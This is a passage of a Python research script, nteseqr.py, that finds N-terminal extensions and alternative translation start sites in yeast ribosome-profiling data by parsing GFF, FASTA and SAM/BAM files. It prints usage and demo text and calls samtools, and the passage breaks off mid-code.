'\t are also scanned for AUG and NCC start codons. We presume that the start \n'+ '\t codon most likely to function as the initiation site will have a confluence \n'+ '\t of features: higher relative start magnitude, higher relative translational \n'+ '\t efficiency, and a significant fraction of total in-frame ribosomes.'+ 'Citation:'+ 'Copyright MIT License - Pieter Spealman' '#=============================================================#\n'+ 'For demonstration use:\n\t python nteseqr.py -demo\n'+ 'To run a install test using defaults, use:\n\t python uorfseqr.py -test\n'+ '') print(monolog) # def demo(): monolog = ('\tStep 1. -load command loads and assigns reads. This will need to be done for '+ 'every pair of RPF and RNA files. Here we use only two, the minimum number.\n') print(monolog) monolog = ('\t\tUsage:\n\tpython nteseqr.py -load -gff <path_to_gff_file> -fa <path to reference fasta file>\n'+ '\t-sample <sample_name> <path_to_RPF_bam_file> <path_to_RNA_bam_file> -o <output_prefix>'+ '\t\tExample:\n\tpython nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_A data/bam/Scer_A_RPF_10.bam data/bam/Scer_A_mRNA_10.bam -o Scer_A_nte\n') print(monolog) ''' python scripts/nteseqr.py -load -gff ensembl_50/saccharomyces_cerevisiae.gff \ -fa ensembl_50/Saccharomyces_cerevisiae.R64-1-1.dna.toplevel.fa \ -samples DGY1657_R1_nte \ /scratch/ps163/STAR_Carolina_03_18_2021/processed/RPF_DGY1657_R1.sorted.bam \ /scratch/ps163/STAR_Carolina_03_18_2021/processed/RNA_DGY1657_R1.sorted.bam \ -o nte/DGY1657_R1_nte ''' monolog = ('\tStep 2. -load command loads and assigns reads for replicate 2.\n') print(monolog) monolog = ('\t\tUsage:\n\tpython nteseqr.py -load -gff <path_to_gff_file> -fa <path to reference fasta file>\n'+ '\t-sample <sample_name> <path_to_RPF_bam_file> <path_to_RNA_bam_file> -o <output_prefix>'+ '\t\tExample:\n\tpython nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_B data/bam/Scer_B_RPF_10.bam data/bam/Scer_B_mRNA_10.bam -o Scer_B_nte\n') print(monolog) ''' python scripts/nteseqr.py -load -gff ensembl_50/saccharomyces_cerevisiae.gff \ -fa ensembl_50/Saccharomyces_cerevisiae.R64-1-1.dna.toplevel.fa \ -samples DGY1657_R2_nte \ /scratch/ps163/STAR_Carolina_03_18_2021/processed/RPF_DGY1657_R2.sorted.bam \ /scratch/ps163/STAR_Carolina_03_18_2021/processed/RNA_DGY1657_R2.sorted.bam \ -o nte/DGY1657_R2_nte ''' monolog = ('\tStep 3. -eval command generates candidate uORFs using the previouslt loaded samples.\n'+ 'Note that the -samples values here are the output (-o) from the previous two steps.\n') print(monolog) monolog = ('\t\tUsage:\n\tpython nteseqr.py -eval -samples <name_of_sample_1> <name_of_sample_2> -o <output_prefix>\n'+ '\t\tExample:\n\tpython nteseqr.py -eval -samples Scer_A_nte Scer_B_nte -o scer.demo/combined\n') print(monolog) ''' python scripts/nteseqr.py -eval -samples nte/DGY1657_R1_nte nte/DGY1657_R2_nte -o nte/DG1657_nte ''' monolog = ('\tStep 4. NTE candidate file.\n'+ '\tThe highest scoring alternative translation initiation site (aTIS) for each NTE event\n'+ 'is output in bed file format.') print(monolog) # def test(): monolog = ('=== Currently Testing nteseqr.py ===') print(monolog) monolog = ('\tTesting Step 1a. -load command loads and assigns reads for replicate 1.\n') print(monolog) bashCommand = ('python nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_A ../data/bam/Scer_A_RPF_10.bam ../data/bam/Scer_A_mRNA_10.bam -o Scer_A_nte') print(bashCommand) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) monolog = ('\tTesting Step 1b. -load command loads and assigns reads for replicate 2.\n') print(monolog) bashCommand = ('python nteseqr.py -load -gff analysis/saccharomyces_cerevisiae.gff -fa data/reference_genomes/Scer_SacCer3.fa -samples Scer_B ../data/bam/Scer_B_RPF_10.bam ../data/bam/Scer_B_mRNA_10.bam -o Scer_B_nte') print(bashCommand) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) monolog = ('\tTesting Step 3. -eval command to evaluate candidates based on loaded expression data.\n') print(monolog) bashCommand = ('python nteseqr.py -eval -samples Scer_A_nte Scer_B_nte -o scer.demo/combined') print(bashCommand) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) ### Argparser definitions parser = argparse.ArgumentParser() ##nteseqr ''' python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r2 r2_RPF.bam r2_RNA.bam -o set_r2 python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r3 r3_RPF.bam r3_RNA.bam -o set_r3 python nteseqr.py -eval -samples set_r2 set_r3 -o set_combined --- python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r2 ./Scer_r2Starved_RPF_genome_Aligned.out.bam ./Scer_r2Starved_mRNA_genome_Aligned.out.bam -o starved_r2 python nteseqr.py -load -gff saccharomyces_cerevisiae.gff -fa Scer_SacCer3.fa -samples starved_r3 ./Scer_r3Starved_RPF_genome_Aligned.out.bam ./Scer_r3Starved_mRNA_genome_Aligned.out.bam -o starved_r3 python nteseqr.py -eval -samples starved_r2 starved_r3 -o starved_combined ''' # help dialog arguments parser.add_argument('-man',"--manual", action='store_true') parser.add_argument('-demo',"--demo",action='store_true') parser.add_argument('-test',"--test",action='store_true') # Load reads arguments parser.add_argument('-load',"--load_reads", action='store_true') parser.add_argument('-i',"--input_file") parser.add_argument('-o',"--output_file") parser.add_argument('-fa',"--fa_file") parser.add_argument('-gff',"--gff_file") parser.add_argument('-samples', '--sample_list', nargs='+') parser.add_argument('-gt',"--gene_tag") parser.add_argument('-tl',"--transcript_leader_tag") parser.add_argument('-3p',"--three_prime_UTR_tag") parser.add_argument('-min_tl',"--minimum_length_transcript_leader") parser.add_argument('-min_3p',"--minimum_length_three_prime_UTR") parser.add_argument('-mask_tl',"--mask_length_transcript_leader") parser.add_argument('-mask_3p',"--mask_length_three_prime_UTR") parser.add_argument('-defualt',"--default_search_region_length") #evaluate arguments parser.add_argument('-eval',"--evaluate", action='store_true') parser.add_argument('-min_reads',"--minimum_reads") # args = parser.parse_args() ### #Common dictionaries start_codons = ['ATG', 'TTG', 'GTG', 'CTG', 'ATC', 'ATA', 'ATT', 'ACG'] stop_codons = ['TAG', 'TAA', 'TGA'] strand_to_sign = {0:'+',1:'-'} complement = {'A':'T','G':'C','T':'A','C':'G'} ### if args.manual: help_dialog() if args.test: test() def parse_cigar(cigar, sequence): """This function calculates the offset for the read based on the match """ # TODO - maybe improve to handle '28M1I4M', 'TCAGGGAAATATTGATTTACCCAAAAAAAGACG' if cigar.count('M') == 1: left_cut = 0 right_cut = 0 left_list = re.split('M|S|D|I|H|N', cigar.split('M')[0])[0:-1] M = re.split('M|S|D|I|H|N', cigar.split('M')[0])[-1] right_list = re.split('M|S|D|I|H|N', cigar.split('M')[1]) for each in left_list: if each: left_cut += int(each) for each in right_list: if each: right_cut -= int(each) n_cigar = ('{}M').format(M) if right_cut: n_sequence = sequence[left_cut:right_cut] else: n_sequence = sequence[left_cut:] #print (left_cut, right_cut, n_cigar, n_sequence) return(True, n_cigar, n_sequence) else: return(False, '', '') def unpackbits(x, num_bits=12): xshape = list(x.shape) x = x.reshape([-1,1]) to_and = 2**np.arange(num_bits).reshape([1,num_bits]) upb = (x & to_and).astype(bool).astype(int).reshape(xshape + [num_bits]) #0 (rp) read_paired #1 (rmp) read_mapped_in_proper_pair #2 (ru) read_unmapped #3 (mu) mate_unmapped #4 (rrs) read_reverse_strand #5 (mrs) mate_reverse_strand #6 (fip) first_in_pair #7 (sip) second_in_pair #8 (npa) not_primary_alignment #9 (rfp) read_fails_platform #10 (pcr) read_is_PCR_or_optical_duplicate #11 (sa) supplementary_alignment """ DISCORDANT definition (from samblaster) Both side of the read pair are mapped (neither FLAG 0x4 or 0x8 is set). The properly paired FLAG (0x2) is not set. Note: We implemented an additional criteria to distinguish between strand re-orientations and distance issues Strand Discordant reads must be both on the same strand. """ """ SPLIT READS Identify reads that have between two and --maxSplitCount [2] primary and supplemental alignments. Sort these alignments by their strand-normalized position along the read. Two alignments are output as splitters if they are adjacent on the read, and meet these criteria: each covers at least --minNonOverlap [20] base pairs of the read that the other does not. the two alignments map to different reference sequences and/or strands. the two alignments map to the same sequence and strand, and represent a SV that is at least --minIndelSize [50] in length, and have at most --maxUnmappedBases [50] of un-aligned base pairs between them. Split read alignments that are part of a duplicate read will be output unless the -e option is used. """ return(upb) def os_mkdir(in_name): if '/' in in_name: directory_name = in_name.rsplit('/',1)[0] if not os.path.exists(directory_name): os.makedirs(directory_name) ### ''' Handle inputs and defaults: users can set their own gff file to define 5'UTRs (aka. transcript leaders), 3'UTRs, Transcription start sites, poly-a sites, and main orf coordinates. Otherwise the standard gff for S.cerevisiae (from Spealman and Naik, Genome Research, 2017) is loaded. ''' if args.gff_file: gff_file = args.gff_file else: gff_file = '../data/reference_genomes/saccharomyces_cerevisiae.gff' ''' Given a gff and fasta identity the upstream in frame stops, then downstream inframe starts, then ask if reads from a sam map to those starts. ''' if args.gene_tag: gene_tag = args.gene_tag else: gene_tag = 'gene' if args.transcript_leader_tag: tl_tag = args.transcript_leader_tag else: tl_tag = 'five_prime_UTR' if args.three_prime_UTR_tag: tp_tag = args.three_prime_UTR_tag else: tp_tag = 'three_prime_UTR' if args.minimum_length_transcript_leader: min_tl = int(args.minimum_length_transcript_leader) else: min_tl = 15 # TODO - future version turns this on #if args.minimum_length_three_prime_UTR: # min_3p = int(args.minimum_length_three_prime_UTR) #else: # min_3p = 15 min_3p = 0 if args.mask_length_transcript_leader: mask_tl = int(args.mask_length_transcript_leader) else: mask_tl = 3 if args.mask_length_three_prime_UTR: mask_3p = int(args.mask_length_three_prime_UTR) else: mask_3p = 3 if args.default_search_region_length: dsrl = int(args.default_search_region_length) else: dsrl = 0 if args.minimum_reads: minimum_reads = int(args.minimum_reads) else: minimum_reads = 3 def parse_name(field): field = field.strip() if 'ID=' in field: field = field.split('ID=')[1] else: if 'PARENT=' in field: field = field.split('PARENT=')[1] if ';' in field: field = field.split(';')[0] if '_mRNA' in field: field = field.split('_mRNA')[0] return(field) def parse_gff(gff_name, gene_tag, tl_tag, tp_tag, min_utr, min_3p, mask_tl, mask_3p): global fasta_dict global filter_nt coord_dict = {} chromosome_set = set() gff_file = open(gff_name) #Build coord_dict for line in gff_file: if line[0] != '#': name = parse_name(line.split('\t')[8]) chromo = line.split('\t')[0] region = line.split('\t')[2] start = int(line.split('\t')[3])-1 stop = int(line.split('\t')[4]) sign = line.split('\t')[6] if chromo not in chromosome_set: if 'chr' in chromo: chromo = chromo.split('chr')[1] chromosome_set.add(chromo) if name not in coord_dict: coord_dict[name] = {'chromo': chromo, 'sign': line.split('\t')[6], 'tl':'', 'gene':'', 'tp': '', 'tl_mask':'', 'tp_mask':''} if chromo not in filter_nt: filter_nt[chromo] = set() if region == gene_tag: coord_dict[name]['gene'] = (start, stop) if region == tl_tag: if abs(stop - start) > min_utr: coord_dict[name]['tl'] = (start, stop) if sign == '+': for nt in range(stop-mask_tl, stop+1): filter_nt[chromo].add(nt) else: for nt in range(start, start+mask_tl+1): filter_nt[chromo].add(nt) else: coord_dict[name]['tl'] = 'too_small' # TODO: Future version - C-terminal extensions should be a similar work flow # if region == tp_tag: # if abs(stop-start) > min_3p: # coord_dict[name]['tp'] = (start, stop) # # if sign == '+': # for nt in range(start, start+mask_3p+1): # filter_nt[chromo].add(nt) # else: # for nt in range(stop-mask_3p, stop+1): # filter_nt[chromo].add(nt) # else: # coord_dict[name]['tp'] = 'too_small' gff_file.close() # cycle through coord_dict, remove anything with 'too_small' remove_set = set() for name, region_dict in coord_dict.items(): if not region_dict['gene']: remove_set.add(name) else: for each_region in ['tl','tp']: if region_dict[each_region] == 'too_small': remove_set.add(name) for remove in remove_set: _pop = coord_dict.pop(remove) if '@' not in remove: outline = ('Removing {} for to short of a UTR.').format(remove) print(outline) return(coord_dict, chromosome_set) def parse_fasta(fasta_name): fasta_file = open(fasta_name) fasta_dict = {} for line in fasta_file: line = line.strip() if line[0] == '>': name = line.split('>')[1].split(' ')[0] name = name.strip() if name not in fasta_dict: fasta_dict[name]='' else: print('Error in FASTQ chromosome name, duplicate names identified.\n Names are after the carrot ">" and before the space " " - Make sure each name is unique. ') quit() else: fasta_dict[name]+=line return(fasta_dict) def rev_comp(seq): seq = seq.upper() seq = seq[::-1] rev_seq = '' for each in seq: rev_seq+= complement[each] return(rev_seq) def use_dsrl(name, region, first_pass_dict, coord_dict): chromo = first_pass_dict[name]['chromo'] sign = first_pass_dict[name]['sign'] gleast = coord_dict[name]['gene'][0] gmost = coord_dict[name]['gene'][1] if region == 'tl': if sign == '+': start = int(gleast)-dsrl stop = int(gleast)-1 first_pass_dict[name][region] = fasta_dict[chromo][start:stop] coord_dict[name][region]=(start, stop) if sign == '-': start = int(gmost)+1 stop = int(gmost)+dsrl first_pass_dict[name][region] = fasta_dict[chromo][start:stop] coord_dict[name][region]=(start, stop) if region == 'tp': if sign == '-': start = int(gleast)-dsrl stop = int(gleast)-1 first_pass_dict[name][region] = fasta_dict[chromo][start:stop] coord_dict[name][region]=(start, stop) if sign == '+': start = int(gmost)+1 stop = int(gmost)+dsrl first_pass_dict[name][region] = fasta_dict[chromo][start:stop] coord_dict[name][region]=(start, stop) return(first_pass_dict, coord_dict) #def derive_coordinates(start, stop, triplet_step, sign, runmode): # if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'): # sr_start = stop - (triplet_step*3)-3 # sr_stop = stop # if (runmode == 'tl' and sign == '-') or (runmode == 'tp' and sign == '+'): # sr_start = start # sr_stop = start + (triplet_step*3)+3 # # return(sr_start, sr_stop) # #def recover_sequence(triplet_step, tl_list, sign, runmode): # if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'): # tl_list = tl_list[::-1] # tl_list = tl_list[1:] def find_stop(name, start, stop, seq, sign, runmode): tl_list = [] sr_seq = [] #if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'): if (runmode == 'tl' and sign == '+'): seq = seq[::-1] for triplet_step in range(len(seq)//3): triplet = seq[(3*triplet_step):(3*triplet_step)+3] tl_list.append(triplet[::-1]) triplet_step = 0 for triplet in tl_list: sr_seq.append(triplet) if triplet in stop_codons: sr_start = stop - (3*triplet_step)-3 sr_stop = stop return(sr_start, sr_stop, sr_seq) triplet_step += 1 return(start, stop, sr_seq) #if (runmode == 'tl' and sign == '-') or (runmode == 'tp' and sign == '+'): if (runmode == 'tl' and sign == '-'): #reverse so the first codon is the one next to the start... seq = seq[::-1] #step out and reverse each codon to the original (negative) orientation, add to list for triplet_step in range((len(seq))//3): triplet = seq[(3*triplet_step):(3*triplet_step)+3] tl_list.append(triplet[::-1]) # scan for stop, first stop send the modified sequence out for detection for triplet in tl_list: sr_seq.append(triplet) if triplet in stop_codons: sr_start = start sr_stop = start + (3*triplet_step)+3 return(sr_start, sr_stop, sr_seq) triplet_step += 1 return(start, stop, sr_seq) return(start, stop, sr_seq) def find_starts(name, chromo, sign, start, stop, tl_list, runmode): global atis_id_dict global coord_dict tl_list = tl_list[::-1] seq = '' if sign == '-': for each_codon in tl_list: each_codon = each_codon[::-1] seq += each_codon else: for each_codon in tl_list: seq += each_codon start_coords = {'full':(start+1, stop)} #start_coords['full']=(start+1, stop) #if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'): if (runmode == 'tl' and sign == '+'): triplet_step = 0 for triplet in tl_list: #sr_seq += triplet if triplet in start_codons: sr_seq = '' for codon in tl_list[triplet_step:]: sr_seq += codon atis_id = ('{}_{}_{}_{}').format(name, triplet, triplet_step, runmode) #atis_id = hash(hash_line) start_coords = {'atis':{},'sr':{}, 'up':{}, 'gene':[coord_dict[name]['gene'][0],coord_dict[name]['gene'][1]], 'meta':{'name':name, 'chromo':chromo, 'sign': sign, 'region':runmode, 'seq':sr_seq, 'triplet':triplet}, 'full': (start+1, stop)} #calc aTIS #+1 for gff format sr_start = start + (3*triplet_step) + 1 sr_stop = sr_start + 3 start_coords['atis'] = (sr_start, sr_stop) #calc whole region sr_start = start + (3*triplet_step) + 1 sr_stop = stop start_coords['sr'] = (sr_start, sr_stop) #calc upstream sr_start = start + 1 sr_stop = start + (3*triplet_step) start_coords['up'] = (sr_start, sr_stop) atis_id_dict[atis_id] = start_coords triplet_step += 1 #if (runmode == 'tl' and sign == '-') or (runmode == 'tp' and sign == '+'): if (runmode == 'tl' and sign == '-'): #tl_list = tl_list[::-1] triplet_step = 0 for triplet in tl_list: if triplet in start_codons: rt_step = len(tl_list)-triplet_step sr_seq = '' for codon in tl_list[triplet_step:]: sr_seq += codon atis_id = ('{}_{}_{}_{}').format(name, triplet, triplet_step, runmode) #atis_id = hash(hash_line) start_coords = {'atis':{},'sr':{}, 'up':{}, 'gene':[coord_dict[name]['gene'][0],coord_dict[name]['gene'][1]], 'meta':{'name':name, 'chromo':chromo, 'sign': sign, 'region':runmode, 'seq':sr_seq, 'triplet':triplet}, 'full': (start+1, stop)} #calc atis sr_start = start + (3*rt_step) - 2 sr_stop = start + (3*rt_step) start_coords['atis'] = (sr_start, sr_stop) #calc whole region sr_start = start + 1 sr_stop = start + (3*rt_step) start_coords['sr'] = (sr_start, sr_stop) #calc upstream sr_start = start + (3*rt_step) + 1 sr_stop = stop start_coords['up'] = (sr_start, sr_stop) atis_id_dict[atis_id] = start_coords triplet_step += 1 return(start_coords) def build_search_region(coord_dict, fasta_dict, dsrl): first_pass_dict = {} #make each, if possible for name, deets in coord_dict.items(): chromo = deets['chromo'] if chromo in fasta_dict: sign = deets['sign'] first_pass_dict[name] = {'chromo': chromo, 'sign': sign, 'tl':'', 'gene':'', 'tp':''} for region in ['tl', 'gene', 'tp']: if deets[region]: start = int(deets[region][0]) stop = int(deets[region][1])+1 if sign == '+': first_pass_dict[name][region] = fasta_dict[chromo][start:stop-1] if sign == '-': first_pass_dict[name][region] = rev_comp(fasta_dict[chromo][start:stop]) #use 'gene' and default search region lenght to fill in those that are absent for name, deets in first_pass_dict.items(): chromo = deets['chromo'] sign = deets['sign'] for region in ['tl', 'tp']: if not deets[region]: first_pass_dict, coord_dict = use_dsrl(name, region, first_pass_dict, coord_dict) #scan for stops and define regions search_region_dict = {} assign_region_dict = {'tl':{}, 'tp':{}} flanking_region_dict = {'tl':{}, 'tp':{}} for name, deets in first_pass_dict.items(): chromo = deets['chromo'] sign = deets['sign'] search_region_dict[name] = {'chromo': chromo, 'sign': sign, 'tl':'', 'tp':'', 'starts':{'tl':{},'tp':{}}} for region in ['tl', 'tp']: r_start = coord_dict[name][region][0] r_stop = coord_dict[name][region][1] sr_start, sr_stop, sr_seq = find_stop(name, r_start, r_stop, deets[region], sign, region) search_region_dict[name]['starts'][region] = find_starts(name, chromo, sign, sr_start, sr_stop, sr_seq, region) if chromo not in assign_region_dict[region]: assign_region_dict[region][chromo]={} if chromo not in flanking_region_dict[region]: flanking_region_dict[region][chromo]={} for nt in range(sr_start, sr_stop+1): if nt not in assign_region_dict[region][chromo]: gene_set = set() gene_set.add(name) assign_region_dict[region][chromo][nt] = gene_set else: assign_region_dict[region][chromo][nt].add(name) for f_nt in range(r_start, r_stop+1): if f_nt not in range(sr_start, sr_stop+1): if f_nt not in flanking_region_dict[region][chromo]: gene_set = set() gene_set.add(name) flanking_region_dict[region][chromo][f_nt] = gene_set else: flanking_region_dict[region][chromo][f_nt].add(name) return(search_region_dict, assign_region_dict, flanking_region_dict) def convert_to_sam(each_sample): if each_sample[-4:] == '.bam': new_name = each_sample.split('.bam')[0]+'.sam' monolog = ('\tLoading bam file {}.\n').format(str(each_sample)) print(monolog) bashCommand = ('samtools view -h -o {} {}').format(new_name, each_sample) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) return(new_name) if each_sample[-4:] == '.sam': return(each_sample) def assign_reads(uid, chromo, start, stop, sign, runmode): global sample_dict global search_region_dict global assign_region_dict global flanking_region_dict global filter_nt hit_ct = 0 filter_region = filter_nt[chromo] for region in ['tl','tp']: for nt in range(start, stop+1): if nt not in filter_region: if nt in assign_region_dict[region][chromo]: gene_set = assign_region_dict[region][chromo][nt] for gene in gene_set: if sign == search_region_dict[gene]['sign']: hit_ct += 1 if gene not in sample_dict[runmode]['sr']: uid_set = set() uid_set.add(uid) sample_dict[runmode]['sr'][gene] = {} sample_dict[runmode]['sr'][gene][nt] = uid_set else: if nt not in sample_dict[runmode]['sr'][gene]: uid_set = set() uid_set.add(uid) sample_dict[runmode]['sr'][gene][nt] = uid_set else: sample_dict[runmode]['sr'][gene][nt].add(uid) else: if nt in flanking_region_dict[region][chromo]: gene_set = flanking_region_dict[region][chromo][nt] for gene in gene_set: if sign == search_region_dict[gene]['sign']: hit_ct += 1 if gene not in sample_dict[runmode]['fl']: uid_set = set() uid_set.add(uid) sample_dict[runmode]['fl'][gene] = {} sample_dict[runmode]['fl'][gene][nt] = uid_set else: if nt not in sample_dict[runmode]['fl'][gene]: uid_set = set() uid_set.add(uid) sample_dict[runmode]['fl'][gene][nt] = uid_set else: sample_dict[runmode]['fl'][gene][nt].add(uid) return(hit_ct) def load_reads(convert_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, runmode): global sample_bam_dict #TODO: Future version - Basic version only extracts 28M reads, make this better sam_file = open(convert_name) ct = 0 hit_ct = 0 header_list = [] for line in sam_file: if line[0] == '@': header_list.append(line) else: ct += 1 cigar = line.split('\t')[5] chromo = line.split('\t')[2] if 'chr' in chromo: chromo = chromo.split('chr')[1] if chromo in chromosome_set: uid = line.split('\t')[0]+'~'+str(ct) flag = line.split('\t')[1] start = int(line.split('\t')[3]) sign = strand_to_sign[unpackbits(np.array([int(flag)]))[0][4]] sequence = line.split('\t')[9] process, n_cigar, n_sequence = parse_cigar(cigar, sequence) stop = start + len(n_sequence) new_hits = assign_reads(uid, chromo, start, stop, sign, runmode) hit_ct += new_hits if new_hits > 0: sample_bam_dict[runmode][uid] = line if '28M' in cigar and runmode == 'RPF': if chromo in chromosome_set: if process: if sign == '-': psite = stop - 13 p_seq = n_sequence[-13] else: psite = start + 12 p_seq = n_sequence[12] mapq = line.split('\t')[4] mid = str(line.split('\t')[6:9]).replace('[','').replace(']','').replace(',','\t').replace("'",'').replace(' ','') qual = str(line.split('\t')[10:]).replace('[','').replace(']','').replace(',','\t').replace("'",'').replace(' ','') new_hits = assign_reads(uid, chromo, psite, psite, sign, 'psites') hit_ct += new_hits new_line = ('{uid}\t{flag}\t{chromo}\t{psite}\t{mapq}\t1M\t{mid}\t{p_seq}\t{qual}\n').format(uid=uid, flag=flag, chromo=chromo, psite=psite, mapq=mapq, mid=mid, p_seq=p_seq, qual=qual) sample_bam_dict['psites'][uid]= new_line sam_file.close() sample_bam_dict['header'] = header_list return() def output_bam(output_dir, header_list, new_bam_dict): file_name = ('{}.sam').format(output_dir) new_sam_file = open(file_name, 'w') for header in header_list: new_sam_file.write(header) for uid, line in new_bam_dict.items(): if uid != 'header': new_sam_file.write(line) new_sam_file.close() print('\tConverting to bam file\n') bashCommand = ('samtools view -Sb {sample_name}.sam > {sample_name}_unsorted.bam').format(sample_name=args.output_file) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) bashCommand = ('samtools sort -o {sample_name}.bam {sample_name}_unsorted.bam').format(sample_name=args.output_file) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) bashCommand = ('samtools index {sample_name}.bam').format(sample_name=args.output_file) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) def output_bed(name, atis_id, tis_scores, atis_sample_dict, outputfile): for each_sample, atis_id_dict in atis_sample_dict.items(): score = np.median(tis_scores) if atis_id in atis_id_dict: check_name = atis_id_dict[atis_id]['meta']['name'] chromo = atis_id_dict[atis_id]['meta']['chromo'] sign = atis_id_dict[atis_id]['meta']['sign'] seq = atis_id_dict[atis_id]['meta']['seq'] triplet = atis_id_dict[atis_id]['meta']['triplet'] start, stop = atis_id_dict[atis_id]['sr'] if name != check_name: print('atis name disagreement', name, check_name, atis_id) else: outline = ('{chromo}\t{start}\t{stop}\t{name}_{triplet}_{seq}_nte\t{score}\t{sign}\n').format(chromo=chromo, start=start, stop=stop, name=name, seq=seq, triplet=triplet, score=score, sign=sign) outputfile.write(outline) return() print('not found', name, atis_id, score) def parse_samples(sample_list): name_dict = {} if sample_list: if len(sample_list)%3!= 0: print('Error: each sample requires a Name, RPF bam file, and RNA bam file.') else: for i in range(int(len(sample_list)/3)): name_dict[sample_list[i*3]]=[sample_list[(i*3)+1], sample_list[(i*3)+2]] return(name_dict) def eval_atis(atis_id, athird): global atis_id_dict global score_dict global eval_atis_dict global quantified_search_regions_dict process_ct = 0 for each_sample in args.sample_list: if atis_id in atis_id_dict[each_sample]: if atis_id_dict[each_sample][atis_id]['meta']['region'] == 'tl': name = atis_id_dict[each_sample][atis_id]['meta']['name'] if name in quantified_search_regions_dict[each_sample]: print(quantified_search_regions_dict[each_sample][name].keys()) if atis_id in quantified_search_regions_dict[each_sample][name]: if quantified_search_regions_dict[each_sample][name][atis_id]['sr']['psites'][0] >= minimum_reads: process_ct += 1 if (process_ct/float(len(args.sample_list)) > 0.5) and process_ct >= 2: for each_sample in args.sample_list: atis_details = quantified_search_regions_dict[each_sample][name][atis_id] if atis_id not in eval_atis_dict: eval_atis_dict[atis_id] = {'rte':[], 'rsm':[], 'tis_score':[], 'pval':[], 'atis_psites':[], 'sr_psites':[], 'up_psites':[]} rte = (atis_details['sr']['RPF'])/float(max(1, atis_details['sr']['RNA'])) rsm = (atis_details['atis']['psites'][0])/float(max(1, sum(atis_details['up']['psites']))) weight = (atis_details['atis']['psites'][0]/float(atis_details['full']['psites'][0])) eval_atis_dict[atis_id]['tis_score'].append(rte * rsm * weight) eval_atis_dict[atis_id]['pval'].append(stats.binom_test([atis_details['sr']['psites'][0], atis_details['sr']['psites'][1] + atis_details['sr']['psites'][2]], p=athird)) if np.median(eval_atis_dict[atis_id]['pval']) <= 0.05 and ((atis_details['sr']['psites'][0] >= atis_details['sr']['psites'][1]) and (atis_details['sr']['psites'][0] >= atis_details['sr']['psites'][2])): output_bed(name, atis_id, eval_atis_dict[atis_id]['tis_score'], atis_id_dict, nte_potential_file) if name not in score_dict: score_dict[name] = {} if atis_id not in score_dict[name]: score_dict[name][atis_id] = (eval_atis_dict[atis_id]['tis_score']) else: print('atis_id error', atis_id) 1/0 if __name__ == '__main__': atis_id_dict = {} filter_nt = {} os_mkdir(args.output_file) if args.load_reads: print('Starting nteseq ... ') name_dict = parse_samples(args.sample_list) #2 parse fasta print('Parsing fasta file... ') fasta_dict = parse_fasta(args.fa_file) #1 parse_gff print('Parsing GFF file for genes with transcript leaders...') coord_dict, chromosome_set = parse_gff(gff_file, gene_tag, tl_tag, tp_tag, min_tl, min_3p, mask_tl, mask_3p) #3 for each gene get fasta of upstream, scan for first stop codon, all start codons print('Defining NTE search regions ...') search_region_dict, assign_region_dict, flanking_region_dict = build_search_region(coord_dict, fasta_dict, dsrl) #4 load bam, sam file print('Loading reads from bam/sam files into candidate regions... ') sample_dict = {'RNA':{'sr':{}, 'fl':{}, 'uid':{}}, 'RPF':{'sr':{}, 'fl':{}, 'uid':{}}, 'psites':{'sr':{}, 'fl':{}, 'uid':{}}} sample_bam_dict = {'RNA':{}, 'RPF':{}, 'psites':{}, 'header':[]} #for i in range(len(name_dict)+1): jobs = [] for each_sample, RPF_RNA_pair in name_dict.items(): print('Loading sample: ' + str(each_sample)) RPF_name, RNA_name = RPF_RNA_pair convert_rpf_name = convert_to_sam(RPF_name) convert_rna_name = convert_to_sam(RNA_name) load_reads(convert_rpf_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RPF') load_reads(convert_rna_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RNA') #TODO: future versions multiprocess read loading #p = multiprocessing.Process(target=load_reads, args=(convert_rpf_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RPF',)) #jobs.append(p) #p = multiprocessing.Process(target=load_reads, args=(convert_rna_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RNA',)) #jobs.append(p) #p.start() #p.join() # print('generating P-site bam files ... ') output_bam(args.output_file, sample_bam_dict['header'], sample_bam_dict['psites']) print('Writing data out:') resource_pickle_name = ('{}_sample_dict.p').format(args.output_file) print('\t' + resource_pickle_name) with open(resource_pickle_name, 'wb') as file: pickle.dump(sample_dict, file) # print('loading reads and p-sites into candidate regions ... ') quantified_search_regions_dict = {} rep_psite_dict = sample_dict['psites']['sr'] rep_RPF_dict = sample_dict['RPF']['sr'] rep_RNA_dict = sample_dict['RNA']['sr'] for atis_id, etc in atis_id_dict.items(): name = etc['meta']['name'] sign = etc['meta']['sign'] if sign == '+': gene_start_codon = etc['gene'][0] else: gene_start_codon = etc['gene'][1] if name in rep_psite_dict: sr_psites_dict = rep_psite_dict[name] sr_RPF_dict = rep_psite_dict[name] sr_RNA_dict = rep_psite_dict[name] if name not in quantified_search_regions_dict: quantified_search_regions_dict[name] = {} if atis_id not in quantified_search_regions_dict[name]: quantified_search_regions_dict[name][atis_id] = {'atis':{}, 'sr': {}, 'up':{}, 'full':{}} for atis_region in ['atis', 'sr', 'up', 'full']: quantified_search_regions_dict[name][atis_id][atis_region] = {'psites':{}, 